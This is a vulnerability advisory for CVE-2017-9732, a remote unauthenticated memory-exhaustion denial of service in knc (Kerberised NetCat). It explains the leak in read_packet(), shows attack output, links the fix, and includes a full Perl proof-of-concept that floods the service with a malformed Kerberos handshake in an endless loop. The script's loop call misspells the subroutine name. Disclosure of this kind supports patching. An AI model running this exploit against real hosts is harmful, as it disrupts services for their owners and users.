knc (Kerberized NetCat) Denial Of Service

2018.12.03
Credit: Imre Rad
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Product "KNC is Kerberised NetCat. It works in basically the same way as either netcat or stunnel except that it is uses GSS-API to secure the communication. You can use it to construct client/server applications while keeping the Kerberos libraries out of your programs address space quickly and easily." ## Links Official page: http://oskt.secure-endpoints.com/knc.html Source code repository: https://github.com/elric1/knc/ ## CVE-2017-9732 vulnerability knc (Kerberised NetCat) before 1.11-1 is vulnerable to denial of service (memory exhaustion) that can be exploited remotely without authentication, possibly affecting another services running on the targeted host. The knc implementation uses a temporary buffer in read_packet() function that is not freed (memory leak). An unauthenticated attacker can abuse this by sending a blob of valid kerberos handshake structure but with unexpected type; instead of token type AP_REQ (0x0100) I sent 0x0000 at bytes 16 and 17 in my proof of concept. During the attack, gss_sec_accept_context returns G_CONTINUE_NEEDED and the memory is exhausted in the long run. The attack might not even be logged, depending on how the Open Source Kerberos Tooling stack is configured. ## Exploit ``` ./memory-exhaustion-poc.pl target-host target-port ``` Top output ~30 seconds later: ``` 2 CPUs; last pid: 20507; load averages: 1.26, 0.84, 0.38 14:11:53 268 processes: 4 running, 264 sleeping CPU states: 38.6% user, 0.0% nice, 27.1% system, 34.3% idle cpu 0: 18.7% user, 0.0% nice, 22.9% system, 58.4% idle cpu 1: 54.7% user, 0.0% nice, 30.7% system, 14.6% idle Memory: 7857M real, 7734M used, 122M free Swap: 4094M total, 0K used, 4094M free PID PSID USERNAME THR PRI NICE SIZE RES STATE TIME CPU COMMAND 20156 19806 username 1 20 0 2165M 2133M cpu1 19:41 46.19% knc ... ``` ## Bugfix https://github.com/elric1/knc/commit/f237f3e09ecbaf59c897f5046538a7b1a3fa40c1 ## Proof of concept # memory-exhaustion-poc.pl #!/usr/bin/perl use strict; use warnings; use IO::Socket::INET; my $host = shift @ARGV || "127.0.0.1"; my $port = shift @ARGV || 2666; my $sock = IO::Socket::INET->new(PeerPort => $port, PeerAddr => $host) or die "Cant connect: $@\n"; $sock->autoflush(); my $data = pack("H*", without_spaces(" 60 82 02 32 06 09 2a 86 48 86 f7 12 01 02 02 00 00 6e 82 02 21 30 82 02 1d a0 03 02 01 05 a1 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); while(1){ send_with_lenght_prefix($data); } sub send_with_length_prefix { my $d = shift; do_send(pack("N", length($d))); do_send($d); } sub do_send { my $d = shift; printf STDERR ">> %s\n", unpack("H*", $d); print $sock $d or die "Cant write: $!"; } sub without_spaces { my $d = shift; $d =~ s/\s*//g; return $d; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top